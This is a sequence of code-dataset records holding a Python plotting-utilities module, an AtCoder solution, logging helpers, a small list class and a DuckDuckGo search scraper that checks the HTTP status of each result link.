seaborn_box(df, cols = None, label_index_level = None, axis_title_suffix = '', title = '', limits = None, ticklabels = None):\n '''Seaborn style box plot'''\n sns.set(style = 'ticks')\n fig = plt.figure(figsize = (8,8))\n ax = sns.boxplot(data = df[cols])\n fig = ax.get_figure()\n sns.despine(offset = 10)\n\n return {'ax':ax, 'fig': fig}\n\ndef scatter_plot(df, cols = None, label_index_level = None, axis_title_suffix = '', title = '', limits = None, ticklabels = None, **kwargs):\n '''\n Make a scatter plot of the first two given columns\n Also return the squared correlation\n '''\n #store results of each replicate as correlation dict\n corr_dict = {}\n num_plotted = len(df)\n fig = plt.figure(figsize = (8,8))\n xname = cols[0]\n yname = cols[1]\n corr = df[xname].corr(df[yname])\n r2_val = corr**2\n\n ax = fig.add_subplot(111)\n ax.scatter(df[xname], df[yname], color = 'k', s = 10)\n ax.text(0.1, 0.9, 'r2 = %1.3f\\nn = %s' % (r2_val, num_plotted), transform = ax.transAxes)\n\n #label_axes(ax, xname = xname, yname = yname, label_index_level = label_index_level, axis_title_suffix = axis_title_suffix)\n\n return {'num_plotted': num_plotted, 'fig': fig, 'ax': ax}\n\ndef reg_plot(df, cols = None, label_index_level = None, axis_title_suffix = '', title = '', limits = None, ticklabels = None, **kwargs):\n '''\n Make a scatterplot using seaborn's regplot\n '''\n #store results of each replicate as correlation dict\n corr_dict = {}\n num_plotted = len(df)\n fig = plt.figure(figsize = (8,8))\n xname = cols[0]\n yname = cols[1]\n corr = df[xname].corr(df[yname])\n r2_val = corr**2\n\n ax = fig.add_subplot(111)\n ax = sns.regplot(data = df, x = xname, y = yname, fit_reg = False)\n #ax.scatter(df[xname], df[yname], color = 'k', s = 10)\n ax.text(0.1, 0.9, 'r2 = %1.3f\\nn = %s' % (r2_val, num_plotted), transform = ax.transAxes)\n set_lim(ax, limits = limits)\n\n #label_axes(ax, xname = xname, yname = yname, label_index_level = label_index_level, axis_title_suffix = axis_title_suffix)\n\n return {'num_plotted': num_plotted, 'fig': fig, 'ax': ax}\n\n\ndef multiscatter_plot(df, cols = None, label_index_level = None, axis_title_suffix = '', filename = None, title = '', limits = None, ticklabels = None):\n '''\n Make a multiscatter plot of all the combinations in given columns\n Also return correlations for each\n '''\n #store results of each replicate as correlation dict\n corr_dict = {}\n num_plotted = len(df)\n pairs = [pair for pair in 
itertools.combinations(range(len(cols)), 2)]\n fig = plt.figure(figsize = (8,8))\n n = 1\n for pair in pairs:\n xi = pair[0]\n yi = pair[1]\n xname = cols[pair[0]]\n yname = cols[pair[1]]\n corr = df[xname].corr(df[yname])\n r2_val = corr**2\n corr_dict['%s_v_%s' % (yname[label_index_level], xname[label_index_level])] = r2_val\n ax = fig.add_subplot(len(pairs) - 1, len(pairs) - 1, n)\n ax.scatter(df[xname], df[yname], color = 'k', s = 10)\n ax.text(0.1, 0.8, 'r2 = %1.3f\\nn = %s' % (r2_val, num_plotted), transform = ax.transAxes)\n ax.set_xlabel('%s %s' % (xname[label_index_level], axis_title_suffix))\n ax.set_ylabel('%s %s' % (yname[label_index_level], axis_title_suffix))\n set_lim(ax, limits = limits)\n #put this in temporarily to see if it will draw it now:\n #fig.canvas.draw()\n set_ticklabels(ax, fig, ticklabels = ticklabels)\n\n n += 1\n\n return {'ax': ax, 'corr_dict': corr_dict, 'num_plotted': num_plotted, 'fig': fig}\n\n\ndef log_transform(df, cols = None, logbase = None, label_index_level = None):\n '''Transform columns with given logbase and return new df and column names'''\n if logbase in np_log_transforms:\n logcols = []\n for col in cols:\n #if col is a tuple, we're dealing with a hierarchical index\n #for now I'm assuming the next level (label_index_level + 1) will have the name of the data to transform\n\n #if label_index_level = 0, indicates that we are plotting different reps against each other\n #if label_index_level = 1, indicates that we are plotting different columns from same rep against each other\n #maybe this should be made more flexible in the future\n if type(col) == tuple:\n newcol = (col[0], '%s_log' % col[1])\n else:\n newcol = '%s_log' % col\n\n df[newcol] = df[col].apply(np_log_transforms[logbase])\n logcols.append(newcol)\n else:\n raise NotImplementedError('logbase %s not supported' % logbase)\n\n #shouldn't need to retun df, as it should be modified here\n return logcols\n\ndef label_axes(ax, xname = None, yname = None, label_index_level = None, axis_title_suffix = ''):\n '''\n label x and y-axes of plot\n If passed with only xname or yname, probably a 1D plot, only label that axis\n '''\n #if it's a multiIndex df, we'd like to specify which level to use,\n #but if it's a single index, then this is going to slice the string which is not what we want\n if type(xname) == tuple:\n ax.set_xlabel('%s %s' % (xname[label_index_level], axis_title_suffix))\n ax.set_ylabel('%s %s' % (yname[label_index_level], axis_title_suffix))\n else:\n ax.set_xlabel('%s %s' % (xname, axis_title_suffix))\n ax.set_ylabel('%s %s' % (yname, axis_title_suffix))\n\ndef set_lim(ax, limits = None):\n if limits != None:\n if 'x' in limits:\n ax.set_xlim(limits['x'][0], limits['x'][1])\n if 'y' in limits:\n ax.set_ylim(limits['y'][0], limits['y'][1])\n\ndef set_ticklabels(ax, fig, ticklabels = None):\n '''\n Swap out default tick labels for custom\n '''\n if ticklabels != None:\n #without calling canvas.draw(), ticklabels may all be set to ''\n fig.canvas.draw()\n if 'xlabel' in ticklabels:\n for tick in ax.get_xticklabels():\n newlabel = ticklabels['xlabel'].get(tick.get_text(), '')\n tick.set_text(newlabel)\n ax.set_xticklabels(ax.get_xticklabels())\n if 'ylabel' in ticklabels:\n for tick in ax.get_yticklabels():\n newlabel = ticklabels['ylabel'].get(tick.get_text(), '')\n tick.set_text(newlabel)\n ax.set_yticklabels(ax.get_yticklabels())\n\ndef save(fig, filename = None, title = '', figformat = 'png', extra_artists = None):\n '''\n Save figure\n '''\n #extra_artists = 
extra_artists[0]\n #plt.tight_layout()\n plt.suptitle(title)\n #plt.subplots_adjust(top = 0.9)\n plt.savefig('%s.%s' % (filename, figformat), bbox_extra_artists = (extra_artists), bbox_inches = 'tight')\n ##plt.savefig('%s.%s' % (filename, figformat))\n ##plt.close(fig)\n\ndef filter_df(df, filter_col = None):\n '''\n Remove rows that are not = True in this column\n If filter_col is actually a list, e.g. [('rep1', 'filter'), ('rep2', 'filter'),...]\n Then this is probably from a multiIndex and test if they all match filter\n '''\n\n #test if there are one or two levels in df:\n if type(filter_col) == list:\n filter_mask = df.loc[:, filter_col].all(axis = 1)\n df = df[filter_mask].copy()\n\n #only 1 level of indexing\n else:\n df = df[df[filter_col] == True].copy()\n\n ##if you don't return the copy made here, then it won't update the one we're working on\n #is there a pandas command to directly modify the copy inplace rather than creating yet another copy?\n return df\n\ndef add_text(ax, s, x, y):\n '''\n note: Adding this because doing it after return seems to put in different place\n '''\n ax.text(x, y, s, transform = ax.transAxes)\n\ndef plot(df, cols = None, plottype = None, logbase = None, title = '', label_index_level = 0, axis_title_suffix = '', filter_col = None, filename = None, limits = None, figformat = 'png', ticklabels = None, labels = None, **kwargs):\n '''\n Given a df and plottype, clean up data and then send to plotting function\n df = pandas dataframe, cols = list of columns with data, plottype = 'scatter', etc.\n filter_column = name of column whose values need to be True to include in the analysis\n limits = {'x':[-1, 1], 'y':[-1, 1]}, for a 1D plot, only use x\n labels = {'ylabel':ylabel, 'xlabel':xlabel} #will overwrite any inferred labels from the column names\n ticklabels = {'xticks':[tick1, tick2,...], 'yticks':[tick1, tick2, ...]} #will overwrite any existing ticklabels\n '''\n #make a copy of the df here. All subsequent operations will modify this copy\n df = df.copy()\n\n if filter_col != None:\n df = filter_df(df, filter_col = filter_col)\n\n df = df[cols].copy()\n clean_df(df, cols = cols)\n\n #get new log-transformed columns if required\n if logbase != None:\n cols = log_transform(df, cols = cols, logbase = logbase, label_index_level = label_index_level)\n clean_df(df, cols = cols)\n\n #send to plotting fxn, which will return plot-specific analyses in the results dict\n results = plot_fxn_dict[plottype](df, cols = cols, title = title, label_index_level = label_index_level, axis_title_suffix = axis_title_suffix, limits = limits, ticklabels = ticklabels, **kwargs)\n\n #formatting, because this works by axis, this is called separately in the multiaxis functions\n if plottype not in ['multiscatter', 'multiscatter2']:\n if limits != None:\n set_lim(results['ax'], limits = limits)\n\n if ticklabels != None:\n #without calling canvas.draw(), ticklabels may all be set to ''\n set_ticklabels(results['ax'], results['fig'], ticklabels = ticklabels)\n\n\n #this doesn't work:(, get_xticklabels not defined. Dang... 
How can you accomplish this then?\n\n if labels != None:\n if 'xlabel' in labels:\n results['ax'].set_xlabel(labels['xlabel'])\n if 'ylabel' in labels:\n results['ax'].set_ylabel(labels['ylabel'])\n\n #todo: maybe set an option to print the ticklabels\n #as with different ranges will be really difficult to tell what the actual labels will be in advance\n if 'text' in kwargs:\n add_text(results['ax'], *kwargs['text'])\n\n if 'ax_loc' in kwargs:\n loc = plticker.MultipleLocator(base = float(kwargs['ax_loc'])) # this locator puts ticks at regular intervals\n results['ax'].yaxis.set_major_locator(loc)\n results['ax'].xaxis.set_major_locator(loc)\n\n if 'xy_line' in kwargs:\n lims = [\n np.min([results['ax'].get_xlim(), results['ax'].get_ylim()]),\n np.max([results['ax'].get_xlim(), results['ax'].get_ylim()])\n ]\n # min of both axes # max of both axes\n results['ax'].plot(lims, lims, 'k-', linestyle = '--')\n\n #hacky fix for now, but should make a default results_dict with these keys\n if 'extra_artists' not in results:\n results['extra_artists'] = None\n\n save(results['fig'], filename = filename, title = title, figformat = figformat, extra_artists = results['extra_artists'])\n #avoid cropping legend on file save: https://stackoverflow.com/questions/10101700/moving-matplotlib-legend-outside-of-the-axis-makes-it-cutoff-by-the-figure-box\n #results['fig'].savefig(filename, bbox_extra_artists=(l,), bbox_inches='tight')\n\n #Uncomment for normal use but while debugging, if you close, will not display in Jupyter\n plt.close(results['fig'])\n\n #print('saved fig')\n return results\n\nplot_fxn_dict = {'multiscatter':multiscatter_plot, 'scatter':scatter_plot, 'box':seaborn_box, 'hist':barhist_plot, 'quickbar':quick_barplot, 'regplot': reg_plot, 'stacked_bar': stacked_bar}\nnp_log_transforms = {2: np.log2, 10: np.log10}\n\n#https://stackoverflow.com/questions/41122923/getting-empty-tick-labels-before-showing-a-plot-in-matplotlib\n","repo_name":"marykthompson/rateseq_pipelines","sub_path":"common_scripts/pipe_utils/pipeline_aux.py","file_name":"pipeline_aux.py","file_ext":"py","file_size_in_byte":21092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15174593099","text":"import math\r\n\r\nN = int(input())\r\npt = 1\r\npa = 1\r\nfor i in range(N):\r\n t, a = map(int, input().split())\r\n\r\n t_ratio = pt // t\r\n a_ratio = pa // a\r\n if pt % t != 0:\r\n t_ratio += 1\r\n if pa % a != 0:\r\n a_ratio += 1\r\n min_ratio = max(t_ratio, a_ratio)\r\n pt = t * min_ratio\r\n pa = a * min_ratio\r\n\r\nprint(pt+pa)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc062/A/4842588.py","file_name":"4842588.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"16730333171","text":"#!/usr/bin/python\n# -*- coding: utf8 -*-\nimport logging\n\n\ndef setup_logger(logger_name, log_file, level=logging.DEBUG): #.INFO\n lz = logging.getLogger(logger_name)\n \n #formatter = logging.Formatter('%(asctime)s : %(message)s')\n formatter =logging.Formatter('Date-Time : %(asctime)s : Line No. 
: %(lineno)d - %(name)s- %(levelname)s - %(message)s')\n fileHandler = logging.FileHandler(log_file, mode='w')\n fileHandler.setFormatter(formatter)\n lz.setLevel(level)\n lz.addHandler(fileHandler)\n streamHandler = logging.StreamHandler()\n streamHandler.setFormatter(formatter)\n lz.addHandler(streamHandler) #-> if enabled, log output also goes to the console\n\n\ndef setup_logger2(logger_name, log_file, consoleLevel=logging.DEBUG, fileLevel=logging.DEBUG):\n lz = logging.getLogger(logger_name)\n # Create handlers\n # Console\n consoleHandler = logging.StreamHandler()\n consoleHandler.setFormatter(logging.Formatter('%(name)s - %(message)s'))\n consoleHandler.setLevel(consoleLevel)\n\n # File\n fileHandler = logging.FileHandler(log_file, mode='w')\n fileHandler.setFormatter(logging.Formatter(\n 'Date-Time : %(asctime)s : Line No. : %(lineno)d - %(name)s- %(process)d - %(levelname)s - %(message)s'))\n fileHandler.setLevel(fileLevel)\n\n lz.addHandler(consoleHandler)\n lz.addHandler(fileHandler)\n\n lz.debug(\"debug test message\")\n lz.info(\"info test message\")\n lz.warning(\"warning test message\")\n lz.critical(\"critical test message\")\n return\n # the only messages that get recorded are warning level and above\n","repo_name":"pjseoane/FIX-Rofex2020.1","sub_path":"Logger/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"34912347136","text":"#!/usr/bin/python3\n\n\"\"\"module containing 'MyList' Class\"\"\"\n\n\nclass MyList(list):\n \"\"\"class MyList that inherits 'list' class\"\"\"\n\n def print_sorted(self):\n \"\"\"prints the list, but sorted (ascending sort)\"\"\"\n list_cpy = self.copy()\n list_cpy.sort()\n print(list_cpy)\n","repo_name":"Fadyy22/alx-higher_level_programming","sub_path":"0x0A-python-inheritance/1-my_list.py","file_name":"1-my_list.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"74445729833","text":"import time\nimport requests\nimport random\nfrom bs4 import BeautifulSoup\nfrom helper import printer\nfrom utils.randomuser import users\n\n\nclass Search:\n \"\"\"\n Searches for a given query on DuckDuckGo.\n\n :param query: The query to search for.\n \"\"\"\n def __init__(self, query):\n url = \"https://duckduckgo.com/html/?q=\" + query\n headers = {\"User-Agent\": random.choice(users)}\n\n try:\n with requests.get(url, headers=headers) as response:\n response.raise_for_status() # Raise exception if request fails\n\n soup = BeautifulSoup(response.text, \"html.parser\")\n results = soup.find_all(\"div\", {\"class\": \"result__body\"})\n\n if len(results) == 0:\n printer.error(f\"No results found for '{query}'..!\")\n return\n\n printer.info(f\"Searching for '{query}' -- With the agent '{headers['User-Agent']}'\")\n time.sleep(1)\n for result in results:\n self.print_search_result(result)\n\n except requests.exceptions.RequestException as e:\n printer.error(f\"Error: {e}\")\n except KeyboardInterrupt:\n printer.error(\"Cancelled..!\")\n\n def print_search_result(self, result):\n \"\"\"\n Prints the result of a search.\n\n :param result: The result to print.\n \"\"\"\n title = result.find(\"a\", {\"class\": \"result__a\"}).text\n link = result.find(\"a\", {\"class\": \"result__a\"})[\"href\"]\n status_code = self.get_status_code(link)\n printer.success(f\"'{title}' - {link} - [{status_code}]\")\n\n @staticmethod\n def 
get_status_code(url):\n \"\"\"\n Retrieves the status code of a given URL.\n\n :param url: The URL to check.\n :return: The status code if the request is successful, or None otherwise.\n \"\"\"\n try:\n with requests.get(url, stream=True) as response:\n response.raise_for_status()\n return response.status_code\n except requests.exceptions.RequestException:\n return None\n","repo_name":"Manan2401/Recon_All","sub_path":"utils/websearch.py","file_name":"websearch.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
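The per-result `get_status_code` call in the record above issues one blocking GET per link, so a page of results is probed serially. A minimal sketch, not part of the original repo, of the same check done concurrently with the standard library; `check_links` and `_status` are hypothetical names, and HEAD requests are assumed acceptable for the target sites:

```python
import concurrent.futures
import requests

def _status(url: str):
    # A HEAD request is usually enough for a status probe and avoids
    # downloading response bodies.
    try:
        return url, requests.head(url, timeout=5, allow_redirects=True).status_code
    except requests.exceptions.RequestException:
        return url, None

def check_links(urls, max_workers=8):
    # Probe all result links in parallel and map each URL to its status
    # code (or None on failure).
    with concurrent.futures.ThreadPoolExecutor(max_workers=max_workers) as pool:
        return dict(pool.map(_status, urls))
```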